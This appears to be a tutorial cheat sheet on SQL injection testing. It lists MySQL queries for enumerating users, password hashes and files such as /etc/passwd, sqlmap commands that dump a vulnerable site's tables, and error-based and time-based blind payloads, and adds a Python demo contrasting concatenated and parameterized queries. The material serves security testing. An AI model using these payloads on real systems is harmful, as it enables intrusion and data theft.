
SQL Injection Cheat Sheet


SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into the queries an application sends to its database. An attacker who knows the correct syntax for injecting SQL commands into an application's back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as SQL injection is one of the most frequently used attacks in today's digital world.


The purpose of this cheat sheet is to provide quick, accurate, ready-to-use commands and the necessary SQLMap queries to help you with SQL injection testing.

Basics of SQL: 

| S. No. | Parameters | SQL Queries/Examples |
|---|---|---|
| 1. | Version | `SELECT @@version;` |
| 2. | Comments | `/* */` or `#` |
| 3. | Current user | `SELECT user();` or `SELECT system_user();` |
| 4. | List users | `SELECT user FROM mysql.user;` |
| 5. | List password hashes | `SELECT host, user, password FROM mysql.user;` |
| 6. | Current Database | `SELECT database();` |
| 7. | List databases | `SELECT schema_name FROM information_schema.schemata;` or `SELECT distinct(db) FROM mysql.db;` |
| 8. | List tables | `SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 9. | List columns | `SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'` |
| 10. | Find Tables From Column Name | `SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';` |
| 11. | Time delay | `SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12` |
| 12. | Local File Access | `UNION ALL SELECT LOAD_FILE('/etc/passwd')` |
| 13. | Hostname/IP Address | `SELECT @@hostname;` |
| 14. | Create user | `CREATE USER test1 IDENTIFIED BY 'pass1';` |
| 15. | Delete user Location of the db file | `SELECT @@datadir;` |

Basic Commands of SQLMap:

| S. No. | Parameters | SQLMap Queries Syntax |
|---|---|---|
| 1. | To attack a database of a vulnerable website | `sqlmap -u "Vulnerable URL" --dbs` |
| 2. | To get tables from a database of a vulnerable website | `sqlmap -u "Vulnerable URL" --tables -D [Name of database]` |
| 3. | To get columns of a table on the vulnerable website | `sqlmap -u "Vulnerable URL" --columns -D [Name of database] -T [table name]` |
| 4. | To dump all values of the table of a vulnerable website | `sqlmap -u "Vulnerable URL" --dump -D [Name of database] -T [table name]` |

Manual Attacks on SQLMap:

| S. No. | Manual Attack Parameters | SQLMap Queries/Examples |
|---|---|---|
| 1. | Quick detect INTEGERS | `select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))` |
| 2. | Quick detect STRINGS | `'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'` |
| 3. | Clear SQL Test | `product.php?id=4`, `product.php?id=5-1`, `product.php?id=4 OR 1=1`, `product.php?id=-1 OR 17-7=10` |
| 4. | Blind SQL Injection | `SLEEP(25)--`, `SELECT BENCHMARK(1000000,MD5('A'));` |
| 5. | Real world sample | `ProductID=1 OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1) OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1' OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1') OR SLEEP(25)=0 LIMIT 1--`, `ProductID=1)) OR SLEEP(25)=0 LIMIT 1--`, `ProductID=SELECT SLEEP(25)--` |
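
The "Clear SQL Test" values above behave differently depending on how the application builds its query. The following added example (not part of the original article) runs them against a string-concatenated query and a parameterized one to show what a tester is looking for and what the fix changes. It assumes an in-memory SQLite database instead of MySQL, and the table and function names are hypothetical.

```python
import sqlite3

# Constructed sample data: five products in an in-memory SQLite database.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(i, f"product-{i}") for i in range(1, 6)])
    return db

def lookup_concat(db, raw_id):
    """Vulnerable: the request value becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, raw_id):
    """Hardened: the request value is bound as data, never parsed as SQL."""
    sql = "SELECT name FROM products WHERE id = ?"
    return [row[0] for row in db.execute(sql, (raw_id,))]

# The four "Clear SQL Test" id values from the table above.
PROBES = ["4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"]

def compare(db):
    """Return {probe: (rows via concatenation, rows via bound parameter)}."""
    return {p: (lookup_concat(db, p), lookup_bound(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (concat_rows, bound_rows) in compare(make_db()).items():
        print(f"id={probe!r:18} concat={concat_rows} bound={bound_rows}")
```

With concatenation, `5-1` is evaluated as arithmetic and the `OR` values return every row, which is the signal that input reaches the SQL parser; with a bound parameter only the literal `4` matches anything.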

You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.



Last Updated : 07 Jun, 2023